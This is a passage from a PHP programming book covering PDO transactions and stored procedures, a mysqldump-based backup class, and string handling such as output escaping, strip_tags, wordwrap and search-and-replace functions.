     of those updates. In other words, transactions can make your scripts faster
     and potentially more robust (you still need to use them correctly to reap that benefit).”

     Unfortunately, not all database systems support transactions. So, by default, PDO
     will run in auto-commit mode, where each query is treated as its own transaction.
     If the database does not support transactions, the query is issued without one.

     If your database supports transactions, rather than using the auto-commit feature,
     you can start and stop transactions manually. In the example above, the
     PDO->beginTransaction and PDO->commit methods are called in the try block. The
     PDO->rollBack method is used in the catch block to roll the database back in case of a
     problem.

     12
          http://www.php.net/pdo
     13
          Emphasis added by the author.
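
To see a rollback at work, here is a self-contained sketch in which the second insert
fails on purpose. It assumes an in-memory SQLite database and a simplified
transactions table; the account names and the NOT NULL failure are contrived for the
illustration.

```php
<?php
// Assumption: an in-memory SQLite table stands in for the bank's database
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE transactions (acctNo TEXT NOT NULL,
    type TEXT NOT NULL, value INTEGER NOT NULL, adjustment TEXT NOT NULL)');

$sql = 'INSERT INTO transactions (acctNo, type, value, adjustment)
    VALUES (:acctNo, :type, :value, :adjust)';
try
{
  $dbh->beginTransaction();
  $stmt = $dbh->prepare($sql);
  // The withdrawal succeeds...
  $stmt->execute(array(':acctNo' => 'savings', ':type' => 'withdrawal',
      ':value' => 100, ':adjust' => '-'));
  // ...but the deposit fails: a NULL account number violates NOT NULL
  $stmt->execute(array(':acctNo' => null, ':type' => 'deposit',
      ':value' => 100, ':adjust' => '+'));
  $dbh->commit();
}
catch (PDOException $e)
{
  // Undo the withdrawal so the money doesn't disappear
  if ($dbh->inTransaction()) {
    $dbh->rollBack();
  }
}

$rows = (int) $dbh->query('SELECT COUNT(*) FROM transactions')
    ->fetchColumn();
echo 'Rows stored after the failed transfer: ', $rows, "\n";
```

Checking inTransaction before calling rollBack avoids a second exception if the
failure happened before the transaction had started.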


How do I use stored procedures with PDO?
Many databases support stored procedures—scripts that are run on your database
typically in a database-specific SQL language.14 Stored procedures allow the manipulation
of the data close to the location where the data is held, reducing bandwidth.
They maintain the separation of the data from the script logic, and allow multiple
systems in potentially different languages to access the data in a uniform manner
(saving you valuable coding and debugging time). Finally, stored procedures increase
query speeds using predetermined execution plans, and can prevent any direct interaction
with the data, thereby protecting it.

Solution
Using PDO to work with stored procedures is fairly easy. In the example below,
you’ll see the simple stored procedure we’ll be interacting with in our code.15 It
does nothing more than generate the quote, “Out, damned spot!” from Shakespeare’s
Macbeth:

                                                                           getQuote.sql (excerpt)

 DROP PROCEDURE IF EXISTS getQuote;

 DELIMITER //
 CREATE PROCEDURE getQuote()
 BEGIN
 DECLARE outStr VARCHAR(45);
 SET outStr = "Out, damned spot!";
 SELECT outStr;
 END//

 DELIMITER ;



14
   Such languages include PL/SQL (Oracle), T-SQL (SQL Server), PL/pgSQL (PostgreSQL), and SQL:2003
(IBM DB2 and MySQL).
15
   This procedure is written in SQL:2003 syntax for MySQL.

Here’s the code that uses the stored procedure:

                                                                          storedProc.php (excerpt)

      try
      {
        $dbh = new PDO($dsn, $user, $password);
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
        $sql = 'CALL getQuote()';
        $stmt = $dbh->prepare($sql);
        $stmt->execute();
        $return_string = $stmt->fetch();
      }
      catch (PDOException $e)
      {
        echo 'PDO Exception Caught. ';
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo 'Error: ' . $e->getMessage();
      }

      echo 'Called stored procedure. It returned: ', $return_string[0];



     The example script will produce this output:

      Called stored procedure. It returned: Out, damned spot!



     Discussion
     Each database’s stored procedure language is different, so be sure to check your
     system’s documentation to identify the specific syntax you’ll need to create a stored
     procedure. To learn more about MySQL’s stored procedures, check out the relevant
     manual pages.16

     In the example above, which was made for MySQL, you’ll notice that the stored
     procedure includes the DECLARE, SET, and SELECT statements. DECLARE creates a
     local variable, SET assigns it a value, and the final SELECT returns that value as
     a result set. Nothing special is needed to retrieve the data from the stored
     procedure: we just use the PDOStatement->fetch method to grab the value returned
     from the final SELECT statement in the stored procedure. (MySQL normally uses an
     OUT parameter for the stored procedure, but this is not necessary with PDO.)

     16
          http://dev.mysql.com/doc/refman/5.0/en/stored-procedures.html


How do I back up my database?
The bigger a database becomes, the more nerve-wracking it can be not to have a
backup of the data it contains. It’s truly the stuff of nightmares: what happens if
your server crashes and everything is lost?

It’s common for database software to have some kind of built-in backup utility for
just this reason. In this solution, we’ll work through an example that uses the
mysqldump utility for the MySQL database system.


Solution
You can export the contents of a database from the command line using mysqldump:

 mysqldump -uuser -psecret world > world.sql



This command will log in to MySQL as user “user” (-uuser) with the password
“secret” (-psecret) and output the contents of the world database to a file called
world.sql. The contents of world.sql will be a series of queries that can be run against
MySQL. Using the mysql utility, we can perform the reverse operation from the
command line:

 mysql -uuser -psecret world < world.sql



You can use PHP’s system function to execute this command from within a PHP
script (though you’ll need to be logged in and able to execute PHP scripts from the
command line). The following example wraps the mysqldump command line utility
in a handy PHP class that you can use to keep regular backups of your site:

                                                         MySQLDump.class.php (excerpt)

 <?php
 class MySQLDump
 {
   private $cmd;
   public function __construct($dbUser, $dbPass, $dbName, $dest,
       $zip = 'gz')
   {
     $zip_util = array('gz'=>'gzip','bz2'=>'bzip2');
     if (array_key_exists($zip, $zip_util))
     {
       $fname = $dbName . '.' . date("w") . '.sql.' . $zip;
       $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
           ' ' . $dbName . '| ' . $zip_util[$zip] . ' >' .
           $dest . '/' . $fname;
     }
     else
     {
       $fname = $dbName . '.' . date("w") . '.sql';
       $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
           ' ' . $dbName . ' >' . $dest . '/' . $fname;
     }
   }
   public function backup()
   {
     system($this->cmd, $error);
     if ($error)
     {
       trigger_error('Backup failed: ' . $error);
     }
   }
 }
 ?>





           MySQLDump Assumptions
          The MySQLDump class makes some assumptions about your operating system
          configuration. It assumes that the mysqldump utility is available in the path of
          the user that executes this script. If the gzip or bzip2 utilities are used, they’re
          also expected to be present in the user’s path. If you have a choice, use bzip2, as
          it provides better compression than gzip, and helps to save disk space.


     The following code shows how this class can be used:

                                                                            backup.php (excerpt)

      <?php
      require_once 'MySQLDump.class.php';
      $dbUser = 'user';
      $dbPass = 'secret';
      $dbName = 'world';
      $dest   = '/home/user/backups';
      $zip    = 'bz2';
      $mysqlDump = new MySQLDump($dbUser, $dbPass, $dbName, $dest, $zip);
      $mysqlDump->backup();
      ?>




This code will create a backup of the world database in the /home/user/backups
directory. If you test this example, make sure to change the variables to suit your
setup.

Discussion
The $dest variable specifies the path to the directory in which the backup file
should be placed. The filename that’s created will be in this format:

databaseName.dayOfWeek.sql.zipExtension


Here’s an example:

world.1.sql.bz2

A number from 0 to 6 that represents the day of the week (0 being Sunday and 6
being Saturday) is inserted into the dayOfWeek element. This filename convention
can provide a weekly rolling backup, with the files for the current week overwriting
those from the previous week. Such an approach should provide adequate backups;
it gives you a week to discover any serious problems, and doesn’t require excessive
disk space for file storage.
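
The rolling filename scheme can be sketched in isolation as follows. This is only an illustration: the backupFileName helper is hypothetical (it isn't part of the MySQLDump class), and it accepts a timestamp purely so that the result can be checked against a known date.

```php
<?php
// Hypothetical helper (not part of the original class): builds the
// rolling backup filename described above for a given timestamp.
function backupFileName($dbName, $zip, $timestamp)
{
  $zipExtensions = array('gz', 'bz2');
  // date('w') yields 0 (Sunday) through 6 (Saturday)
  $fname = $dbName . '.' . date('w', $timestamp) . '.sql';
  if (in_array($zip, $zipExtensions, true))
  {
    $fname .= '.' . $zip;
  }
  return $fname;
}

// 1 January 2024 was a Monday, so the day-of-week element is 1
$monday = mktime(12, 0, 0, 1, 1, 2024);
echo backupFileName('world', 'bz2', $monday), PHP_EOL;
// One week later the same name is produced, so the old file is overwritten
echo backupFileName('world', 'bz2', $monday + 7 * 24 * 60 * 60), PHP_EOL;
```

Because the name depends only on the day of the week, at most seven files per database ever exist in the destination directory.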

The use of a compression utility is optional. The default value of the $zip parameter
is gz, which indicates that the gzip utility should be used. The other option is bz2,
which indicates that the bzip2 utility should be used. If neither of these values is
supplied, no compression is applied; however, for large databases it’s a good idea
to use a compression tool to minimize the amount of disk space required.

This class is intended for use with the crontab utility, which is a Unix feature that
allows you to execute scripts on a regular (for example, daily) basis.
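
One point worth considering before scheduling the script: the constructor concatenates the user name, password, database name, and destination straight into a shell command, so a value containing spaces or shell metacharacters could break the command. A minimal sketch of one way to guard against this, assuming a hypothetical buildDumpCommand helper that isn't part of the class above, is to pass each value through PHP’s escapeshellarg function:

```php
<?php
// Hypothetical helper (an assumption, not from the original class):
// builds the mysqldump command with every supplied value escaped.
function buildDumpCommand($dbUser, $dbPass, $dbName, $destFile)
{
  return 'mysqldump -u' . escapeshellarg($dbUser) .
      ' -p' . escapeshellarg($dbPass) .
      ' ' . escapeshellarg($dbName) .
      ' > ' . escapeshellarg($destFile);
}

// The password below contains a space and a semicolon, both of which
// would otherwise be interpreted by the shell.
echo buildDumpCommand('user', 'pa ss;word', 'world',
    '/home/user/backups/world.1.sql'), PHP_EOL;
```

The exact quoting that escapeshellarg applies depends on the platform, so the command is best inspected on the server where it will run.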

     Catering to Platform Differences
     You may have noticed that the above MySQLDump class will only work on a *nix
     server. What if your database server uses a Windows box? I offer the following
     solution to circumvent this problem. First we define an abstract MySQLDump class,
     then we extend it to create a class for each platform, and finally we create a factory
     method to instantiate the correct MySQLDump object needed. Here’s our abstract
     MySQLDump class:

                                                     AbstractMySQLDump.class.php (excerpt)

      require_once 'MySQLDump_ms.class.php';
      require_once 'MySQLDump_nix.class.php';

      abstract class MySQLDump
      {
        public static function factory($dbUser, $dbPass, $dbName, $dest,
            $zip)
        {
          if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
          {
            return new MySQLDump_ms($dbUser, $dbPass, $dbName, $dest,
                $zip);
          }
          else
          {
            return new MySQLDump_nix($dbUser, $dbPass, $dbName, $dest,
                $zip);
          }
        }

        abstract public function __construct($dbUser, $dbPass, $dbName,
            $dest, $zip = 'gz');

        public function backup()
        {
          system($this->cmd, $error);
          if ($error)
          {
            throw new MySQLDumpException(
                'Backup failed: Command = ' . $this->cmd .
                ' Error = ' . $error);
          }
        }
      }

      class MySQLDumpException extends Exception {}




The backup method represents our backup API. Child classes need to implement a
custom constructor that sets the cmd property. Overriding the backup method is
optional. The static method factory will instantiate the appropriate MySQLDump
subclass based on the PHP_OS constant, which identifies the host platform. We’ve
also added a custom exception class, MySQLDumpException, for error handling.

The *nix version of our backup class will contain an implementation similar to the
solution class above, but we’ll need to change the class definition so that it extends
the abstract MySQLDump class:

                                                    MySQLDump_nix.class.php (excerpt)

 require_once 'AbstractMySQLDump.class.php';
 class MySQLDump_nix extends MySQLDump
 {
   protected $cmd;

     public function __construct($dbUser, $dbPass, $dbName, $dest,
       $zip = 'gz')
     {
       $zip_util = array('gz'=>'gzip','bz2'=>'bzip2');
       if (array_key_exists($zip, $zip_util))
       {
         $fname = $dbName . '.' . date("w") . '.sql.' . $zip;
         $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
             ' ' . $dbName . '| ' . $zip_util[$zip] . ' >' .
             $dest . '/' . $fname;
       }
       else
       {
         $fname = $dbName . '.' . date("w") . '.sql';
         $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
             ' ' . $dbName . ' >' . $dest . '/' . $fname;
       }
     }
 }

     We can then make an implementation for the Windows platform:

                                                       MySQLDump_ms.class.php (excerpt)

      require_once 'AbstractMySQLDump.class.php';
      class MySQLDump_ms extends MySQLDump
      {
        protected $cmd;

          public function __construct($dbUser, $dbPass, $dbName, $dest,
              $zip = 'none')
          {
            $fname = $dbName . '.' . date("w") . '.sql';
            $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
                ' ' . $dbName . ' >' . $dest . '\\' . $fname;
          }
      }



     The Windows version above includes changes to suit the Windows path and ignores
     the $zip argument due to the lack of gzip and bzip2 on that platform. This class
     also assumes that the path to the mysqldump.exe executable file is in the system
     PATH environment variable.

     Here’s an example of a backup script that makes use of the above classes on a
     Windows box:

                                                                   backup2.php (excerpt)

      <?php
      require_once 'AbstractMySQLDump.class.php';
      try
      {
        $dbUser = 'user';
        $dbPass = 'secret';
        $dbName = 'world';
        $dest   = 'c:\backups';
        $zip    = 'none';
        $mysqlDump = MySQLDump::factory($dbUser, $dbPass, $dbName,
            $dest, $zip);
        $mysqlDump->backup();
      }
      catch (Exception $e)
      {
        echo $e->getMessage();
      }
      ?>




Since we’ve used an abstract class to define our API, the use of the class remains
the same no matter what platform it’s used on, as long as it’s one of our supported
platforms.


Summary
There you have it: our whirlwind tour of PDO and databases is done! By now, you
should have a grasp of how PHP’s PDO extension works with databases. We also
covered the topics of searching, stored procedures, protecting your script from
SQL injection attacks, writing flexible code, and making database backups.

Being able to work comfortably with a database is part of a strong foundation for
PHP, and learning to make the most of PHP’s PDO extension only makes it easier.
Use the examples and solutions presented here to help build on your existing
database skills.

I also hope you’ll take the time to learn more about SQL and your database. Learning
the nuances and capabilities of your chosen database platform can only help make
your code more efficient and elegant over time.
Chapter 3




Strings
Strings are arguably the basis, the raison d’être, nay, the beating heart of PHP. After
all, PHP really boils down to the input and output of strings. So, it’s hardly surprising
that PHP has more string-related functions than almost any other scripting language!

Unlike other languages such as C, strings in PHP are not arrays of characters; they’re
considered to be a simple type, or scalar. In PHP, strings can be defined using either
single (') or double (") quotes. Strings defined using double quotes are interpolated,
which means that variables within the string are replaced with their values.
Use single quotes for strings that require no interpolation. Strings themselves are
case sensitive, but a number of string functions allow operations on strings in a
case-insensitive manner. The PHP manual web site’s String Functions page has
links to all the string-related functions available.1

PHP’s variable interpolation is one of the many features that make the language so
quick and easy to use. However, there are limits to its capabilities. First, have a look
at this example:




1
    http://www.php.net/strings/

      <?php
      $who = 'world';
      echo "Hello $who";
      ?>



     Here, we have a very simple variable, $who, that has a value of 'world'. When we
     place the variable name in the string, we end up with an output of “Hello world”.

     While this example is very simple, you may run into situations where your data is
     contained in an array or a complex object. In these cases, we need to help the
     PHP interpreter along: we either enclose the variable in braces ({ and }) or use
     concatenation with the . operator. Here’s an example of what I mean:

      <?php
      $user = array(
          "first_name" => "Davey",
          "last_name" => "Shafik"
      );
      // Using Braces
      echo "Hello {$user['first_name']} {$user['last_name']}";
      // Using Concatenation
      echo 'Hello ' . $user['first_name'] .' '. $user['last_name'];
      ?>



     In the above example we demonstrate variable interpolation by wrapping our
     variables in braces. The final statement shows that we can achieve the same output
     if we use simple concatenation.
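
The same two techniques apply when the data lives in an object rather than an array. Here’s a minimal sketch, assuming a nested stdClass object whose property names are invented purely for illustration:

```php
<?php
// Illustrative data only: a nested object built with stdClass
$user = new stdClass();
$user->name = new stdClass();
$user->name->first = 'Davey';
$user->name->last = 'Shafik';

// Braces let the parser follow the whole property chain
$withBraces = "Hello {$user->name->first} {$user->name->last}";

// Concatenation produces the same string
$withConcat = 'Hello ' . $user->name->first . ' ' . $user->name->last;

echo $withBraces, PHP_EOL;
```

Without the braces, PHP would only interpolate the first property in the chain, which is why the braces are needed here.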

     Even though strings are considered to be scalar values, PHP has the ability to treat
     strings as arrays in certain situations. Consider this quick example where we output
     a string letter by letter in a for loop:

      <?php
      $string = 'Hello World!';
      $length = strlen($string);
      for ($i = 0; $i < $length; $i++) {
        echo $string[$i] . '<br />';
      }
      ?>

Notice that we output a single letter from the string using array notation. That code
will output the following:

 H<br />e<br />l<br />l<br />o<br /> <br />W<br />o<br />r<br />l<br />d<br />!<br />


This ability to treat strings as arrays only goes so far, though. You can’t, for example,
pass a string to one of PHP’s array functions.
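
If you do need a real array, one option is to convert the string first. The sketch below uses PHP’s str_split function for this; it assumes single-byte characters, since str_split works on bytes rather than on multibyte characters.

```php
<?php
$string = 'Hello';

// str_split turns the string into a real array, one character per element
$letters = str_split($string);

// The result can now be passed to array functions
$reversed = implode('', array_reverse($letters));
$count = count($letters);

echo $reversed, ' (', $count, ' letters)', PHP_EOL;
```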


How do I output strings safely?
The most common activity you will perform with strings is to output them.
Whether you’re outputting strings to a browser or to a database, you’ll need to be
careful to encode the strings properly. Some string data has special meaning and
may, to take a best-case scenario, obscure the output; in the worst case, outputting
the wrong string data can cause security vulnerabilities.

Solution
When outputting a string to a browser, we must consider several aspects:

■ Are you outputting a URL inside an <a> tag?
■ Are you outputting to an HTML form element?
■ Do you want to show or remove any HTML?
■ Do you need to preserve formatting?

Let’s look at an example:

 <?php
 $text = "Ben & Jerrys Ice Cream";
 echo '<a href="/buy/' . rawurlencode($text) . '">Buy ' .
     htmlentities($text) . '</a>';
 ?>



Here, the $text variable contains an ampersand (&) which we need to escape.
We need to perform two separate actions on the text in order to escape the ampersand
in the two places where it is used. Firstly, we need to use the rawurlencode function
to convert the ampersand and spaces to a valid URL string. The second operation
uses the htmlentities function to turn the ampersand into a valid HTML entity, because
“&” is a special character in HTML (and XML).

The resulting HTML looks like this:

 <a href="/buy/Ben%20%26%20Jerrys%20Ice%20Cream">Buy Ben &amp; Jerrys Ice Cream</a>

In the URL string, the ampersand has been replaced with %26, and spaces with %20,
and the ampersand in the link text has been replaced by &amp;.

     More considerations arise when you’re outputting strings as a means to prepopulate
     form fields. Perhaps you want to display default data, display user input for
     confirmation purposes, or deal with an error. Again, the htmlentities function gets
     the job done:

      <?php
      $quote = '"So long, and thanks for all the fish!"';
      ?>
      <input type="text" name="fave_quote"
          value="<?php echo htmlentities($quote); ?>" />



     If we use the htmlentities function, we can ensure that the value will display
     without any issues, even though it contains double quotes. Here is the output of
     the above code:

      <input type="text" name="fave_quote"
          value="&quot;So long, and thanks for all the fish!&quot;" />



     The quotes have been transformed to the HTML entity &quot;.
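
The same function also covers the case where we want to show HTML to the visitor rather than have the browser interpret it. Here’s a minimal sketch using some invented input text; the ENT_QUOTES flag and the explicit 'UTF-8' character set are choices made for this illustration, not something the examples above require.

```php
<?php
// Illustrative input: text that contains markup and both kinds of quotes
$comment = '<b>Bold</b> & "quoted" isn\'t it?';

// ENT_QUOTES also converts single quotes; the charset is stated explicitly
$safe = htmlentities($comment, ENT_QUOTES, 'UTF-8');

echo $safe, PHP_EOL;
```

The browser will now display the <b> tags as text instead of rendering the word in bold.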

     When we’re inserting data into a database, it’s considered best practice to insert the
     data without any escaping transformations intended for output, such as those we
     just used in transforming strings to HTML. This practice ensures that you can change
     the output format at will. However, when we insert data into a database we must
     escape certain characters to ensure that the data doesn’t interfere with the query
     itself, and to prevent SQL injection attacks. How you escape the data you insert
     depends on your choice of database; for MySQL, for example, we use the
     mysql_real_escape_string function.

Take a look at this example of some code that escapes string data submitted via a
hypothetical form:

 <?php
 $first_name = mysql_real_escape_string($_POST['first_name']);
 $last_name = mysql_real_escape_string($_POST['last_name']);
 $fave_quote = mysql_real_escape_string($_POST['fave_quote']);
 $sql = "INSERT INTO my_table (first_name, last_name, fave_quote)
     VALUES ('$first_name', '$last_name', '$fave_quote')";
 // ⋮ proceed with query: mysql_query($sql);
 echo $sql;
 ?>



Use of the mysql_real_escape_string function ensures that no matter what the
user submits through our form, it won’t break the SQL we’re trying to execute: it
neither causes an error nor allows the user to execute unwanted SQL. Other database
management systems have their own specific string escaping functions, too. For
example, if you use PostgreSQL or SQLite, you can use pg_escape_string and
sqlite_escape_string respectively. Note that the mysql_* functions were removed
in PHP 7; on current PHP versions, use mysqli_real_escape_string or PDO instead.
PDO users can use PDOStatement->bindParam or the PDO->quote method, which are
discussed in “How do I protect my web site from an SQL injection attack?” in Chapter 2.


How do I preserve formatting?
Imagine you want to output an email to a web page, but in doing so, you want to
preserve the formatting of the email—retaining the line breaks. Does PHP have a
handy string function available?

Solutions
You have a choice of two simple approaches to ensure that text formatting is
preserved on a web page. Firstly, and most simply, you can enclose your text within
a <pre> tag. Alternatively, if you don’t want to risk breaking the page layout on long
lines, you can convert newline characters to <br /> tags using the nl2br function.

You may have a piece of HTML like this:

      <p>Dear Sir or Madam,
      This is my nicely formatted letter. I hope that it really impresses you.

      Look! I've started a new paragraph.
      Yours faithfully,
      Mike Format</p>



     As you probably know, your user will see the following result when this HTML is
     output:

      Dear Sir or Madam, This is my nicely formatted letter. I hope that it really
      impresses you. Look! I've started a new paragraph. Yours faithfully, Mike Format


     But by applying the nl2br function, we can ensure users will see the text as it was
     formatted:

      <p>Dear Sir or Madam,<br />
      This is my nicely formatted letter. I hope that it really impresses you.<br />
      <br />
      Look! I've started a new paragraph.<br />
      Yours faithfully,<br />
      Mike Format</p>
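
In PHP, the conversion might look like the sketch below. The letter text is shortened for illustration, and escaping it with htmlentities before calling nl2br is an assumption about how you’d want to treat text that comes from an email.

```php
<?php
// Illustrative text with line breaks and a blank line
$letter = "Dear Sir or Madam,\nThis is my letter.\n\nYours faithfully,\nMike Format";

// Escape the text first, then convert newlines to <br /> tags
$html = '<p>' . nl2br(htmlentities($letter, ENT_QUOTES, 'UTF-8')) . '</p>';

echo $html, PHP_EOL;
```

Note that nl2br inserts the <br /> tag before each newline and keeps the newline itself, so the HTML source stays readable.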




     How do I strip HTML tags from text?
     If you allow your site to be updated by the general public, it’s important to prevent
     the use of HTML—you want to prevent visitors from posting markup that interferes
     with your site’s layout.

     Solution
     The PHP function strip_tags handles this job almost perfectly. Given some text,
     strip_tags will eliminate anything that looks like an HTML tag. To be more exact,
     strip_tags removes any block of text that begins with < and ends with >, while
     everything other than the tags is left exactly as it was. Here’s a simple example:

    <?php
    $text = 'This is <b>bold</b> and this is <i>italic</i>. What about ' .
        'this <a href="http://www.php.net/">link</a>?';
    echo strip_tags($text);
    ?>



This results in the following output:

    This is bold and this is italic. What about this link?



You can also supply strip_tags with a list of allowed tags that you want it to ignore.
Let’s alter the above example slightly:

    echo strip_tags($text, '<b><i>');



This time, strip_tags will ignore the <b> and <i> tags and strip the rest, producing
the following output:

    This is <b>bold</b> and this is <i>italic</i>. What about this link?



Discussion
As you can see, strip_tags leaves the text between opening and closing tags
untouched. If it finds a < character but fails to find a matching > character, it will
remove all the text to the end of the string.

Even though it’s the recommended solution, removing HTML with strip_tags does
not guarantee that your site will be safe from potential harm to its layout. By allowing
certain tags that you consider to be safe for visitors to use, you give visitors the
potential to use attributes in those tags, such as style, which can cause problems
with your site’s layout. Worse still, the submission of JavaScript contained in a link
can result in a cross-site scripting (XSS) security exploit. For more information on
XSS and how to prevent it, see the solutions on Chris Shiflett’s site,2 as well as
WikiBlog’s page on XSS prevention.3
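
To see the attribute problem in action, consider this short sketch. The input string is invented for illustration; the point is simply that an allowed tag passes through strip_tags with every one of its attributes intact.

```php
<?php
// Illustrative input: an allowed tag carrying unwanted attributes
$text = '<b style="font-size:500%" onmouseover="alert(1)">Hi</b> <i>there</i>';

// <b> is allowed, so it survives along with all of its attributes
$result = strip_tags($text, '<b>');

echo $result, PHP_EOL;
```

The <i> tag is removed as expected, but the style and onmouseover attributes on the <b> tag remain in the output.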




2
    http://shiflett.org/articles/foiling-cross-site-attacks
3
    http://wiki.flux-cms.org/display/BLOG/XSS+Prevention


     How do I force text to wrap after a certain number of characters?
     One function that most developers find very handy is wordwrap. If you have a long
     string of text that contains no particular formatting, you can use wordwrap to insert
     a character, such as a newline character (\n), at a specified interval. wordwrap takes
     care not to break up words unless you specifically tell it to. This function can be
     particularly useful when it comes to constructing well-laid-out email messages.

     Solution
     To use wordwrap, we simply pass it a string. wordwrap’s default behavior is to wrap
     the text as close to 75 characters as possible (it won’t break words), inserting a
     newline character (\n) at each breakpoint. In this example, we intend to output
     HTML, so we supply two extra arguments to change this default behavior:

      <?php
      $string = "This is a long sentence that will be cut at sixty characters " .
          "automatically. Don't worry, no words will be broken up.";
      echo wordwrap($string, 60, "<br />");
      ?>



     With this call, wordwrap wraps the text at 60 characters, and inserts <br /> tags
     instead of newline characters. Here’s what it outputs:

      This is a long sentence that will be cut at sixty characters<br />automatically. Don't worry, no words will be broken up.


     Thus, we’ve wrangled this unwieldy sentence into something far more manageable
     without breaking any of the words.
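
If you do want long words to be broken, wordwrap accepts a fourth argument for that purpose. The following sketch uses a deliberately short, made-up string so that the difference between the two behaviors is easy to see:

```php
<?php
$long = 'abcdefghij';

// By default, a word longer than the width is left intact
$intact = wordwrap($long, 5, "\n");

// With the fourth argument set to true, long words are cut at the width
$cut = wordwrap($long, 5, "\n", true);

echo $cut, PHP_EOL;
```

Cutting is mostly useful for content such as long URLs, which could otherwise push a narrow column out of shape.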


     How do I perform advanced search and replace operations?
     PHP comes with a powerful collection of string functions that can be used for search
     and replace operations. Your first glance at the relevant manual pages on the PHP
     web site may suggest that these functions are simple, but with a little cunning,
     there’s much you can accomplish with them.4 The functions str_replace, strpos,
     and substr_replace are three such examples: they appear simple at first, but we
     can use them to accomplish complex tasks. str_replace replaces all occurrences
     of one string in another, strpos returns the position of the first occurrence of one
     string in another, and substr_replace replaces text within a portion of a string.

Solutions
The easiest way to search and replace text is using the str_replace function. Let’s
consider the following code:

    <?php
    $word = 'general-purpose';
    $text = <<<EOD
    PHP (recursive acronym for "PHP: Hypertext Preprocessor")
     is a widely used Open Source general-purpose scripting language.
    EOD;
    echo str_replace($word, '<strong>' . $word . '</strong>', $text);
    ?>



The above example performs a very simple search and replace operation that helps
us add HTML markup to text. In this case, the string “general-purpose” in the text
is wrapped with a <strong> tag, and produces the following output:

    PHP (recursive acronym for "PHP: Hypertext Preprocessor")
     is a widely used Open Source <strong>general-purpose</strong> scripting language.


The substr_replace function provides control over how text is to be replaced, but
to use it, we need to specify the location and length of the text to replace. For
example, if we wanted to replace only the first instance of a piece of text, we
could try this:




4
    http://www.php.net/strings/

      <?php
      function addTag($text, $word, $tag)
      {
        $length = strlen($word);
        $start = strpos($text, $word);
        // Leave the text unchanged if the word isn't found
        if ($start === false)
        {
          return $text;
        }
        $word   = '<' . $tag . '>' . $word . '</' . $tag . '>';
        return substr_replace($text, $word, $start, $length);
      }
      $text = <<<EOD
      PHP (recursive acronym for "PHP: Hypertext Preprocessor")
       is a widely used Open Source general-purpose scripting language.
      EOD;
      echo addTag($text, 'general-purpose', 'strong');
      ?>



     Here we’ve created a function, addTag, which wraps an HTML tag around the first
     occurrence of a specified word. To perform this task using substr_replace, we
     have to find the length of the word, using strlen, and its position within the text,
     using strpos.

     substr_replace is very flexible. If you specify a negative value for the $start
     argument, it will begin the replacement operation counting from the end of the text
     instead of the beginning. The $length argument, which represents how much of the
     original text to replace, is optional. If this argument is omitted, everything from
     the $start position to the end of the string is replaced. If it’s set to zero, no text
     is replaced; the replacement string is simply inserted into the text at the location
     specified by the $start parameter. A negative value represents the number of
     characters from the end of the text at which the replacement operation will stop.
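
These variations are easier to follow with concrete values. The sketch below runs substr_replace against a short, made-up string with a zero length, a negative start, and a negative length:

```php
<?php
$text = 'Hello world';

// Length of zero: nothing is removed, the new text is inserted at $start
$inserted = substr_replace($text, 'PHP ', 6, 0);

// Negative $start: counting begins from the end of the string
$fromEnd = substr_replace($text, 'there', -5);

// Negative $length: replacement stops six characters before the end
$stopEarly = substr_replace($text, 'Goodbye', 0, -6);

echo $inserted, PHP_EOL, $fromEnd, PHP_EOL, $stopEarly, PHP_EOL;
```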


     How do I break up text into an array of lines?
     Let’s say that you have information contained within a string value that you’d like
     to split up into separate values, such as a list of tags separated by commas, or a list
     of items separated by newline characters. What’s the best way to complete this task?

     Solution
     If we assume that our piece of text contains line feed characters, we can use the
     explode function to break it up into an array of lines:

 <?php
 $text = <<<EOD
 This will be row 1
 This will be row 2
 This will be row 3
 This will be row 4
 EOD;
 $lines = explode(PHP_EOL, $text);
 echo '<table border="1">' .PHP_EOL;
 foreach ($lines as $line)
 {
   echo '<tr>' .PHP_EOL. '<td>' .$line. '</td>' .PHP_EOL. '</tr>' .
       PHP_EOL;
 }
 echo '</table>' .PHP_EOL;
 ?>



This script uses explode to break the text at the line feed characters and place the
text into an array. The PHP_EOL constant—the current operating system’s end of line
(EOL) character—is used for the line feed character to make the script more portable.
The array is then used to build an HTML table, which you can see in Figure 3.1.




                        Figure 3.1. Using explode to output text as a table


Discussion
It’s useful to know that the implode function does exactly the opposite of what
we’ve seen here—it builds a string out of an array. Let’s add the following line to
the above example:

 echo implode(PHP_EOL, $lines);



Here’s the resulting output of our original string:

      This will be row 1
      This will be row 2
      This will be row 3
      This will be row 4
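
The same approach handles the comma-separated list of tags mentioned at the start of this solution. In the sketch below, the input strings are invented for illustration, and the use of preg_split with the \R escape is an alternative of my own for text whose line endings may not match the server’s PHP_EOL value:

```php
<?php
// Illustrative input: a comma-separated list of tags with stray spaces
$tagString = 'php, strings , pdo';

// Split on the commas, then trim the whitespace from each item
$tags = array_map('trim', explode(',', $tagString));

// Text that mixes Windows (\r\n) and Unix (\n) line endings
$mixed = "row 1\r\nrow 2\nrow 3";

// \R matches any newline sequence, whichever platform produced the text
$rows = preg_split('/\R/', $mixed);

echo implode('|', $tags), PHP_EOL, implode('|', $rows), PHP_EOL;
```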




     How do I trim whitespace from text?
     When we’re dealing with form submissions, among other tasks, we often need to
     consider whitespace. Sometimes it’s submitted by the user in error—it is hard to
     see, after all. It may also be submitted on purpose by users who want to avoid filling
     in fields, for example.

     The presence of whitespace in submitted data can cause problems for your
     application. The erroneous inclusion of whitespace could result in the storage of
     incorrect usernames or email addresses, for instance, so it’s useful to be able to
     trim the whitespace from submitted form values.

     Solution
     The trim function is another handy PHP tool. It removes whitespace characters at
     the start and end of strings, and works like this:

      <?php
      $string = ' This has whitespace at both ends               ';
      // Remove that whitespace
      $string = trim($string);
      if (strlen($string) > 0) {
        // ⋮ It's not just spaces…
      }
      ?>



     This straightforward function allows us to make sure that a user can’t send us spaces
     instead of real data. If we merely want to trim whitespace from the left- or right-
